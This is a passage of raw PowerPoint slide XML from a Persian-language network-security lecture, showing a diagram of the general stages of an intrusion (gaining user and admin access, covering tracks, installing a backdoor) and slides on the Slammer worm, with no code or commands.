            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347140" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="2838450"/>
            <a:ext cx="890589" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1200" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دسترسي</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347141" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="2228850"/>
            <a:ext cx="885825" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کسب دسترسي در سطح کاربر</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347142" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="3305175"/>
            <a:ext cx="885825" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کسب دسترسي در سطح مدير</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347160" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7200000" flipV="1">
            <a:off x="2501900" y="3108325"/>
            <a:ext cx="230188" cy="450850"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="28575" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347161" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7200000" flipH="1" flipV="1">
            <a:off x="2363787" y="2871788"/>
            <a:ext cx="498475" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="28575" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347162" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2952750"/>
            <a:ext cx="0" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="38100" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 40"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3643313" y="3067050"/>
            <a:ext cx="2774950" cy="573088"/>
            <a:chOff x="2295" y="1776"/>
            <a:chExt cx="1748" cy="361"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347144" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="1776"/>
              <a:ext cx="587" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="808080">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>پوشاندن ردپاها</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347145" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1776"/>
              <a:ext cx="587" cy="361"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="808080">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>نصب دريچه</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347163" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2295" y="1926"/>
              <a:ext cx="393" cy="210"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347164" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3275" y="1971"/>
              <a:ext cx="181" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 41"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3643313" y="2266950"/>
            <a:ext cx="4398962" cy="3406775"/>
            <a:chOff x="2295" y="1272"/>
            <a:chExt cx="2771" cy="2146"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347146" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4438" y="1728"/>
              <a:ext cx="628" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="808080">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>برداشتن يا خراب کردن اطلاعات</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347147" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4461" y="1272"/>
              <a:ext cx="558" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="808080">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>ساير فعاليتهاي غير مجاز</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347152" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4469" y="2288"/>
              <a:ext cx="558" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="808080">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>حمله به اهداف ثانويه</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347165" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2295" y="2448"/>
              <a:ext cx="2174" cy="970"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347166" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4043" y="1496"/>
              <a:ext cx="395" cy="475"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347167" name="Line 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4043" y="1971"/>
              <a:ext cx="395" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347168" name="Line 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4043" y="1971"/>
              <a:ext cx="426" cy="477"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36"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b="1" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"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childTnLst>
                                    <p:animMotion origin="layout" path="M 0.0 0.0 L 0.0 -0.07213" pathEditMode="relative" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="500" accel="50000" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="347140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                    <p:animRot by="1500000">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="250" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="347140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-1500000">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="250"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="347140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-1500000">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="500"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="347140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="1500000">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="250" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="750"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3471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fa-IR" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>کرم Slammer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E1123D57-84B3-407D-B801-CAF212337FC7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29700" name="Picture 5" descr="S:\csci8980\project\sql-after.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8305800" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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274638"/>
            <a:ext cx="8229600" cy="796925"/>
          </a:xfrm>
          <a:no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fa-IR" smtClean="0"/>
              <a:t>کرم Slammer</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1828800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfr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90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> کرم مهرباني بود! چرا که اين کرم ميتوانست با يک حمله </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> گسترده تمام </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> را از کار بياندازد، ولي اين کار را نکرد.</a:t>
            </a:r>
